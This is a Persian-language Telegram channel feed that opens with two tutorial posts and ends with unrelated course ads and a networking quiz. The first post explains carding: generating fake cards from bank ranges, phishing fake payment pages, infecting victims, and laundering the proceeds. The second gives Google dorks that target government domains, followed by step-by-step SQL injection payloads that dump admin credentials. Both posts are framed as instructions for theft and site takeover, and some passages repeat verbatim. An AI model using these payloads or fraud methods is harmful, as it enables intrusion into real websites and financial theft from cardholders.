گفتیم دزیدن اطلاعات کارتهای بانکی، پس لازمه اول راجع به کارتهای بانکی بین المللی اطلاعات بدست بیاریم.
کارتهای خارجی تایپ های مختلفی دارن که مزایا و معایبشو نوشتم:
💳مستر: مستر کارت یه کارت جهانیه با امنیت متوسط و ضمانت متوسط.
💳اکسپرسس: امنیت زیادی داره، ضماتت خیلی زیاد، خرید آسان اما کارتی کمیاب.
💳ویزا: ویزا کارت هم جهانیه ، امنیت پایینی داره و ضمانت کم.
[اینجا یه پرانتز باز میکنم و امنیت و ضمانت رو توضیح میدم، امنیت که مشخصه، یعنی هر چقدر امنیت بیشتر باشه، کارِ کاردر برای دزدیدن اطلاعات اون، سختتره.
و ضمانت یعنی در صورت رخ دادن همچین اتفاق هایی مثل کاردینگ، بانک گردن بگیرش بالاست یا نه😅 در واقع خسارت رو قبول میکنه یا نه؟ بعضی از بانکها بدون اینکه حتی کاربر متوجه بشه پول رو بازگشت میزنن و از جیب خودشون میدن اما بعضی بانک ها کاربرر رو مقصر میدونن، با این تفاسیر بهترین کارت اکسپرسس امریکا هستش]
🔶مبحث بعدی دبیت کارت و کردیت کارته
توی خیلی از کشورها، علیرغم ایران که فقط دبیت کارت داره، کردیت کارد دارن. یعنی چی؟ تو دبیت کارتها فقط میتونی به اندازه پولت خرج کنی ولی کردیت کارتا هر چقدر بخوای (تا سقفی که پیش اون بانک اعتبار داری) و به هر واحد پولی که بخوای، بانک برات حساب میکنه و تو اخر ماه باهاش صاف میکنی. (که خب اینجا معلوم میشه ک کردیت کارتها بیشتر مناسب کار مان😎 دزدی بدون محدودیت داریم اینجا😂)
🔶حالا خود این کردیت کارتها، که کارتهای مورد بحث ما هستن رو، میشه به دو نوع ازشون سو استفاده کرد :
1️⃣تولید کارتای جعلی با حد کم که معمولا با باگ گرفتن از درگاه های بانکی انجام میشه، مثلا بعضی درگاها رنج دادن که از ۱۲۳۴ تا ۲۲۳۴ رنج بین ترکیه است و نفوذگر هم میزنه جنریت میکنه و از اعتبار کلی کارت که اصلا وجود ندارن استفاده میشه 😄 اما خب معمولا اعتبارشون رو کمترین حالته. توضیحات کاملتر این روش رو تو این پست میتونید بخونید.
2️⃣روش بعدی جعلِ کارتهای واقعی هستش که اینجا معمولا اعتبار کاربرها بالاست و این یعنی میتونید خرید تپل بزنید 🫣🛒این جعل کارتهای واقعی با روش های مختلفی انجام پذیره که یکیشم فیشینگ یا همون جعل درگاه پرداخت هستش، یعنی شما میاید یه صفحه ای شبیه صفحه ی پرداختهای معتبر میسازید و به روشی، کاربر رو هدایت میکنید به اون صفحه، کاربرم که از همه جا غافل میاد از درگاه استفاده بکنه و اطلاعات کارت بانکیشو وارد میکنه و برای شما ارسال میشه :) ، روش دیگه اش دادن ویروس به کاربر و بعد نفوذ به کیف پولهاش و دریافت اطلاعات کارت بانکیشه ، روش دیگه هک سایتهای مرجع و بانکهاست که دیگه اون خیلی سطحش بالاست و به ما نمیخوره😅 ولی در اون حالت همه چیز تو مشتتونه و یه سرقت بزرگ 🙃👊🏻 و روشهای دیگه...
🔶خب ما تا اینجا کارتهارو شناختیم و فهمیدیم چجوری میشه اطلاعاتشون رو دریافت کرد
حالا میخوایم ببینیم بعد اینکه اطلاعاتشو دریافت کردیم چیکار میتونیم باهاش بکنیم؟
اینجاست که بحث پولشویی یا همون تبدیل پولایی که از راه خلاف بدست میاد به پول مشروع وسط میاد.
که اینم روشای مختلفی داره:
💵فروش اطلاعات کارت به افرادی که تو این حوزه فعالن
💵خرید زدن از سایتهای بین الملل مثل امازون یا خرید اکانت و نرم افزار و ... و بعد فروختن اونها به افرادی که خریدارن
💵خرید ارزهای دیجیتال
و ...
🔶بطور خلاصه کاردینگ به هر گونه دزدی از حساب های بانکی به هر روشی از جمله فیشینگ و ... گفته میشه و دنیای خیلی بزرگ و گسترده ای داره که سعی کردم تو این مطلب از سیر تا پیازش رو بگم امیدوارم مفید واقع شده باشه🧅😄
👤 Drwcsi
💎 Channel: @DevelopixNetwork
👍16🔥1
😎🔥اموزش نفوذ به وبسایت ها
📌خب شاید بگید چه تیتر کلیشه ای و تکراری ای ! چون احتمالا بارها به گوشتون خورده ولی جز تبلیغ چنل اصغر هک ، چیز دیگه ای دستگیرتون نشده😅. ولی خب باید بگم این کار غیر ممکن نیست و با پیدا کردن آسیب پذیری ها میشه انجامش داد 🙃
📌یکی از این آسیب پذیری ها ، SQL injection یا تزریق SQL هستش💉.
🔹یه توضیح اجمالی درباره SQL بدم و بریم سراغ اصل مطلب.
خب همونطور که خیلیاتون میدونید، SQL یه زبان برنامه نویسی برای ایجاد و مدیریت پایگاه های داده یا دیتابیس ها هستش، یعنی چی؟! یعنی میشه گفت تقریبا تمام اطلاعات سایت ها به روی یه بستری حفظ و نگهداری میشن و داخل اون طبقه بندی میشن که به اون بسترها پایگاه داده میگن. مثل چه اطلاعاتی؟! اطلاعات هویتی کاربران سایت، اطلاعات لاگین به سایت ادمین ها و یوزر ها، اطلاعات محصولات و ... .
🔹خب چی گفتم؟ اطلاعات لاگین ادمین ها 🙄🦷 وقت دندون تیز کردنه ؛ چرا که با بدست آوردن اطلاعات لاگین ادمین در واقع مدیریت کل سایت رو بدست میگیریم و همه چی تمومه😁...
📌خب بریم سراغ اصل مطلب یا همون پیاده سازیش😎
1️⃣مرحله اول پیاده سازی اینه که پیدا کنیم چه سایتهایی این آسیب پذیری رو دارن؟!
🔹ما میتونیم با کمک دورک نویسی این سایتهارو پیدا کنیم[اگه نمیدونی دورک چیه تو پستهای قبلی توضیحش دادم حتما بخون]؛ چندتا دورک پیشنهادی براتون مینویسم ولی در نهایت خودتون هم میتونید با سرچ کردن دورک های اماده ی مخصوص این اسیب پذیری رو پیدا کنید و تو طیف گسترده تری جستجوتون رو انجام بدین👌🏼🔎
🔻
🔹اگه دنبال گاورمنت ها نیستید میتونید پسوند های دیگه ای رو جستجو کنید برای مثال شرکت های تجاری (.com) یا بیزینس ها (.biz) یا شرکت های اطلاع رسانی (.info) و غیره رو برای کشورهای مختلف دیگه ای خارج از موارد بالا مثل کانادا (.ca) یا امارات (.ae) یا کلمبیا (.co) و ... استفاده کنید.
2️⃣تو مرحله دوم باید صفحات وبسایت مورد نظر رو تست کنیم که ببینیم کدوم صفحه باگ رو داره.
برای اینکار باید url اش رو دستکاری کنیم که اینکار خودش دوتا روش داره :
روش اول -> قرار دادن سینگل کوتیشن اخر ادرس سایت ؛ مثل:
در این حالت اگه سایت لود بشه که یعنی آسیب پذیر نیست ولی اگه آسیب پذیر باشه شمارو به صفحه ای با ادرس warning:mysqlfetcharray() منتقل کرد یعنی حاوی آسیب پذیریه و میتونیم کارمونو شروع کنیم 😎
و روش دوم -> استفاده از کلمه اند؛ مثل :
در این حالت سایت باید ناقص لود بشه و یا لود نشه تا متوجه بشیم آسیب پذیره، در غیر اینصورت آسیب پذیر نیست.
مابقی مراحل رو تو پست بعدی دنبال کنید 👀👇🏼
👤 Drwcsi
💎 Channel: @DevelopixNetwork
📌خب شاید بگید چه تیتر کلیشه ای و تکراری ای ! چون احتمالا بارها به گوشتون خورده ولی جز تبلیغ چنل اصغر هک ، چیز دیگه ای دستگیرتون نشده😅. ولی خب باید بگم این کار غیر ممکن نیست و با پیدا کردن آسیب پذیری ها میشه انجامش داد 🙃
📌یکی از این آسیب پذیری ها ، SQL injection یا تزریق SQL هستش💉.
🔹یه توضیح اجمالی درباره SQL بدم و بریم سراغ اصل مطلب.
خب همونطور که خیلیاتون میدونید، SQL یه زبان برنامه نویسی برای ایجاد و مدیریت پایگاه های داده یا دیتابیس ها هستش، یعنی چی؟! یعنی میشه گفت تقریبا تمام اطلاعات سایت ها به روی یه بستری حفظ و نگهداری میشن و داخل اون طبقه بندی میشن که به اون بسترها پایگاه داده میگن. مثل چه اطلاعاتی؟! اطلاعات هویتی کاربران سایت، اطلاعات لاگین به سایت ادمین ها و یوزر ها، اطلاعات محصولات و ... .
🔹خب چی گفتم؟ اطلاعات لاگین ادمین ها 🙄🦷 وقت دندون تیز کردنه ؛ چرا که با بدست آوردن اطلاعات لاگین ادمین در واقع مدیریت کل سایت رو بدست میگیریم و همه چی تمومه😁...
📌خب بریم سراغ اصل مطلب یا همون پیاده سازیش😎
1️⃣مرحله اول پیاده سازی اینه که پیدا کنیم چه سایتهایی این آسیب پذیری رو دارن؟!
🔹ما میتونیم با کمک دورک نویسی این سایتهارو پیدا کنیم[اگه نمیدونی دورک چیه تو پستهای قبلی توضیحش دادم حتما بخون]؛ چندتا دورک پیشنهادی براتون مینویسم ولی در نهایت خودتون هم میتونید با سرچ کردن دورک های اماده ی مخصوص این اسیب پذیری رو پیدا کنید و تو طیف گسترده تری جستجوتون رو انجام بدین👌🏼🔎
🔻
us
site:.gov.uk inurl:id
site:.gov.us inurl:id
🔻german
site:.gov.de inurl:id
🔻chin
site:.gov.cn inurl:id
🔹مثلا تو موارد بالا میایم گاورمنت هایی که مربوط به امریکا و یا المان و یا چین هستن و توی url شون کلمه id وجود داره رو جستجو میکنیم(وجود کلمه ایدی میتونه یکی از نشونه های این آسیب پذیری باشه)🔹اگه دنبال گاورمنت ها نیستید میتونید پسوند های دیگه ای رو جستجو کنید برای مثال شرکت های تجاری (.com) یا بیزینس ها (.biz) یا شرکت های اطلاع رسانی (.info) و غیره رو برای کشورهای مختلف دیگه ای خارج از موارد بالا مثل کانادا (.ca) یا امارات (.ae) یا کلمبیا (.co) و ... استفاده کنید.
2️⃣تو مرحله دوم باید صفحات وبسایت مورد نظر رو تست کنیم که ببینیم کدوم صفحه باگ رو داره.
برای اینکار باید url اش رو دستکاری کنیم که اینکار خودش دوتا روش داره :
روش اول -> قرار دادن سینگل کوتیشن اخر ادرس سایت ؛ مثل:
example.com/?page_id=16'در این حالت اگه سایت لود بشه که یعنی آسیب پذیر نیست ولی اگه آسیب پذیر باشه شمارو به صفحه ای با ادرس warning:mysqlfetcharray() منتقل کرد یعنی حاوی آسیب پذیریه و میتونیم کارمونو شروع کنیم 😎
و روش دوم -> استفاده از کلمه اند؛ مثل :
example.com/?page_id=16+and+1=0در این حالت سایت باید ناقص لود بشه و یا لود نشه تا متوجه بشیم آسیب پذیره، در غیر اینصورت آسیب پذیر نیست.
مابقی مراحل رو تو پست بعدی دنبال کنید 👀👇🏼
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔥8👍3
3️⃣خب بعد از اینکه تارگتمون رو پیدا کردیم، تو مرحله سوم میخوایم تعداد ستونهای جدول های دیتابیس رو پیدا کنیم که با دستور order by انجام میگیره، که به شکل زیر استفاده میشه :
تو اینجا دو تا عدد وجود داره عدد ۹۹۹ تعداد جدولهاست که ما اون رو ماکسیمم ترین حالت در نظر میگیریم تا کد بتونه اجرا بشه و عدد ۵ تعداد ستون ها ؛ ما باید تعداد ستونهارو از یه عدد بزرگ شروع کنیم و در صورت دریافت خطا متوجه بشیم که تعداد ستونها کمتره و انقدر پیش بریم و عدد رو کوچیک کنیم و تست کنیم تا دیگه خطا دریافت نکنیم و در واقع تعداد ستونها رو بدست بیاریم 🙂✔️
4️⃣ تو مرحله قبل تعداد کلی ستون هارو بدست اوردیم اما الان میخوایم تعداد ستون های آسیب پذیر رو به کمک دستور union select بدست بیاریم؛ به این صورت که :
خروجی این کد به شما اعدادی رو نشون میده مثل ۱-۲-۴ که نشون دهندهٔ ستون های آسیب پذیره.
5️⃣ تو گام پنجم میریم سراغ مهم ترین مسئله یا همون بیرون کشیدن جدول ادمین 👩🏼💻که از طریق information_schema انجام میشه.
خب به چه صورت؟!
اسم هایی که معمولا روی جدول ادمین قرار داده میشن موارد زیر هستن :
User,users,admin,login,username,usr,_user,tbladmin,tbluser,tblusers
6️⃣ خب خب ، نوبیتم باشه نوبت فراخوانی جدول ادمین با کمک دستور where هست؛
7️⃣در گام نهایی باید اطلاعات لاگین رو از جدول ادمین استخراج کنیم که به این شکل انجام میشه:
اگه نکتهی تکمیل کننده یا موردی هست کامنت کنید...
👤 Drwcsi
💎 Channel: @DevelopixNetwork
http://example.com/test.php?id=-999+order+by+5--تو اینجا دو تا عدد وجود داره عدد ۹۹۹ تعداد جدولهاست که ما اون رو ماکسیمم ترین حالت در نظر میگیریم تا کد بتونه اجرا بشه و عدد ۵ تعداد ستون ها ؛ ما باید تعداد ستونهارو از یه عدد بزرگ شروع کنیم و در صورت دریافت خطا متوجه بشیم که تعداد ستونها کمتره و انقدر پیش بریم و عدد رو کوچیک کنیم و تست کنیم تا دیگه خطا دریافت نکنیم و در واقع تعداد ستونها رو بدست بیاریم 🙂✔️
4️⃣ تو مرحله قبل تعداد کلی ستون هارو بدست اوردیم اما الان میخوایم تعداد ستون های آسیب پذیر رو به کمک دستور union select بدست بیاریم؛ به این صورت که :
http://example.com/test.php?id=5+union+select+1+2+3+4+5--
در واقع وقتی فهمیدیم جدولمون ۵ ستون داره ، جلوی آیدی ۵ رو قرار دادیم و به تعداد ستون هاش در اخر url عدد اضافه کردیم تا بتونیم از بین این ۵ ستون، ستونهای آسیب پذیر رو پیدا بکنیم. خروجی این کد به شما اعدادی رو نشون میده مثل ۱-۲-۴ که نشون دهندهٔ ستون های آسیب پذیره.
5️⃣ تو گام پنجم میریم سراغ مهم ترین مسئله یا همون بیرون کشیدن جدول ادمین 👩🏼💻که از طریق information_schema انجام میشه.
خب به چه صورت؟!
http://www.example.com/test.php?id=5+union+select+1,group_concat(table_name),3
,4,5+from+information_schema.tables--
خب اینجا گفتیم بیاد و جدولهای دیتابیس رو که به کمک group concat مرتب و گروه بندی شده رو بهمون نمایش بده ؛ که اون هم بچه حرف گوش کنیه 🦻🏼 و بهمون اسم جدول هارو نمایش میده. خب حالا وقتشه که از بین جدولها دنبال جدول ادمین بگردیم 👀😅اسم هایی که معمولا روی جدول ادمین قرار داده میشن موارد زیر هستن :
User,users,admin,login,username,usr,_user,tbladmin,tbluser,tblusers
6️⃣ خب خب ، نوبیتم باشه نوبت فراخوانی جدول ادمین با کمک دستور where هست؛
www.example.com/test.php?id=5+union+select+1,2,group_concat(column_name),4,5+from+information_schema.columns+where+table_name='admin'
حالا اطلاعات داخل جدول ادمین نمایش داده میشه .7️⃣در گام نهایی باید اطلاعات لاگین رو از جدول ادمین استخراج کنیم که به این شکل انجام میشه:
www.example.com/test.php?id=5+union+select+1,2,group_concat(username,0x3a,password),4,5+from+admin
الان اطلاعات لاگین به شکل admin:Act3ey67c به نمایش در میان و شما تونستید رمز ورود به پنل ادمین سایت رو بدست بیارید 💪🏼😅 و الان به تمام سایت دسترسی دارین :)😎💜اگه نکتهی تکمیل کننده یا موردی هست کامنت کنید...
👤 Drwcsi
💎 Channel: @DevelopixNetwork
🔥7👍3
Forwarded from Zi. Ta
https://www.instagram.com/reel/Cud-Z5StHG4/?igshid=MmU2YjMzNjRlOQ==
🔹️ اگر در عنوان های زیر مشغول به کار هستید ،یا میخواهید در این زمینه ها پیشرفت کنید ، این پیج درحال برگزاری دوره و آموزش های بسیار خوبی هست که خیلی به دردتون میخوره :
🔺️مدیران شبکه، زیرساخت و لینوکس
🔺️ متخصصان مانیتورینگ
🔺️ متخصصان DevOps
🔺️ متخصصان تحلیل داده
🔹️ اگر در عنوان های زیر مشغول به کار هستید ،یا میخواهید در این زمینه ها پیشرفت کنید ، این پیج درحال برگزاری دوره و آموزش های بسیار خوبی هست که خیلی به دردتون میخوره :
🔺️مدیران شبکه، زیرساخت و لینوکس
🔺️ متخصصان مانیتورینگ
🔺️ متخصصان DevOps
🔺️ متخصصان تحلیل داده
👍2
Forwarded from Developix Support
📌 اگر دنبال تبدیل شدن به یک برنامهنویس مطرح در دنیای فریلنسری و کسب درآمد بیشتر هستی، شرکت در این کارگاه رو از دست نده!
💻 کارگاه تجارت بینالمللی برای برنامهنویسها؛
(فریلنسرینگ حرفهای در مقیاس جهانی)
🗓 زمان: 30 شهریور تا 6 مهر 1402
حضوری و آنلاین (2 جلسه حضوری و 5 جلسۀ آنلاین)
📝 اطلاعات بیشتر و ثبتنام
🔻و یا برای کسب اطلاعات بیشتر کافیه به آیدی ما پیام بدی!
🆔 @MaktabSharif_Admin
🌐 وبسایت |📱کانال تلگرام | 📲 اینستاگرام
💻 کارگاه تجارت بینالمللی برای برنامهنویسها؛
(فریلنسرینگ حرفهای در مقیاس جهانی)
🗓 زمان: 30 شهریور تا 6 مهر 1402
حضوری و آنلاین (2 جلسه حضوری و 5 جلسۀ آنلاین)
📝 اطلاعات بیشتر و ثبتنام
🔻و یا برای کسب اطلاعات بیشتر کافیه به آیدی ما پیام بدی!
🆔 @MaktabSharif_Admin
🌐 وبسایت |📱کانال تلگرام | 📲 اینستاگرام
👎3
Forwarded from کار و کسب، عادل طالبی 📌
This media is not supported in your browser
VIEW IN TELEGRAM
📌 دوره آنلاین سئو برای مدیران، آخرین روز ثبتنام با تخفیف ویژه
🔘 استراتژی سئو
🔘 مدیریت فرآیندهای سئو
🔘 گزارشات سئو
🔘 ارزیابی و نظارت بر فرآیندهای سئو
🔘 اشتباهات سئو
🔘 قراردادهای سئو
این دوره پس از سه سال مجدداً برگزار میشود. در این دوره یاد میگیرید چگونه فرآیندهای سئو را مدیریت کنید. این دوره برای مدیران و صاحبان کسب و کارها مفید است که بدانند از تیم سئو چه بخواهند و چگونه از اجرای صحیح فرایندهای سئو اطمینان یابند. همچنین متخصصین سئو یاد میگیرند چگونه با کارفرمایان به شکل درست تعامل و همکاری کرده، به نیازهای آنها پاسخ صحیح بدهند.
پنج جلسه آموزش انلاین فشرده و تخصصی همراه با یک جلسه پرسش و پاسخ.
اطلاعات بیشتر و ثبتنام در ایسمینار:
🌐 eseminar.tv/wb116105
کد تخفیف: talebi
فقط امروز و فردا، به جای 5 میلیون تومان فقط با 2 میلیون تومان در این دوره آنلاین شرکت کنید.
هدایای شرکت در دوره:
🔘 حداقل 2 میلیون تومان رپورتاژ در تریبون
🔘 اکانت 6 ماهه جتسئو به ارزش 1.200.000 تومان
🔘 اکانت یک سالۀ سازمانی میزیتو به ارزش 2.900.000 تومان
🔘 یک جلد کتاب سئو 2022+2023 امضاء شده.
❌❌ فقط امروز ❌❌
☑️ @kar_kasb
🔘 استراتژی سئو
🔘 مدیریت فرآیندهای سئو
🔘 گزارشات سئو
🔘 ارزیابی و نظارت بر فرآیندهای سئو
🔘 اشتباهات سئو
🔘 قراردادهای سئو
این دوره پس از سه سال مجدداً برگزار میشود. در این دوره یاد میگیرید چگونه فرآیندهای سئو را مدیریت کنید. این دوره برای مدیران و صاحبان کسب و کارها مفید است که بدانند از تیم سئو چه بخواهند و چگونه از اجرای صحیح فرایندهای سئو اطمینان یابند. همچنین متخصصین سئو یاد میگیرند چگونه با کارفرمایان به شکل درست تعامل و همکاری کرده، به نیازهای آنها پاسخ صحیح بدهند.
پنج جلسه آموزش انلاین فشرده و تخصصی همراه با یک جلسه پرسش و پاسخ.
اطلاعات بیشتر و ثبتنام در ایسمینار:
🌐 eseminar.tv/wb116105
کد تخفیف: talebi
فقط امروز و فردا، به جای 5 میلیون تومان فقط با 2 میلیون تومان در این دوره آنلاین شرکت کنید.
هدایای شرکت در دوره:
🔘 حداقل 2 میلیون تومان رپورتاژ در تریبون
🔘 اکانت 6 ماهه جتسئو به ارزش 1.200.000 تومان
🔘 اکانت یک سالۀ سازمانی میزیتو به ارزش 2.900.000 تومان
🔘 یک جلد کتاب سئو 2022+2023 امضاء شده.
❌❌ فقط امروز ❌❌
☑️ @kar_kasb
Forwarded from Developix Support
This media is not supported in your browser
VIEW IN TELEGRAM
دایناسورها در حال خرید در تهران 🤯
⚡️هیچوقت فکرشو میکردی که همچین تصویری رو ببینی؟
⚡️از آینده به تو سلام 😁
💠این تصویر با استفاده از یک ابزار جدید در تلگرام ساخته شده که هر متنی بهش بدی رو تبدیل به عکس میکنه!
همینالان بهش پبام بده تا عکسش رو برات بفرسته😇
فقط کافیه بزنی رو آیدی زیر و شروع کنی 😉👇🏻
@aiolearn_artbot
🌀هوشمصنوعی با پیشرفت فوقالعادش داره همه دنیار رو فرا میگیره 😉🤯
⚡️هیچوقت فکرشو میکردی که همچین تصویری رو ببینی؟
⚡️از آینده به تو سلام 😁
💠این تصویر با استفاده از یک ابزار جدید در تلگرام ساخته شده که هر متنی بهش بدی رو تبدیل به عکس میکنه!
همینالان بهش پبام بده تا عکسش رو برات بفرسته😇
فقط کافیه بزنی رو آیدی زیر و شروع کنی 😉👇🏻
@aiolearn_artbot
🌀هوشمصنوعی با پیشرفت فوقالعادش داره همه دنیار رو فرا میگیره 😉🤯
👎11
...... برای جلوگیری از Loop لایه ۳ و ...... برای جلوگیری از Loop لایه ۲ می باشد. (از چپ به راست)
Anonymous Quiz
28%
Loopback - STP
43%
TTL - STP
17%
RSTP - PVSTP
11%
VLAN - Broadcast Storm
👍10🔥5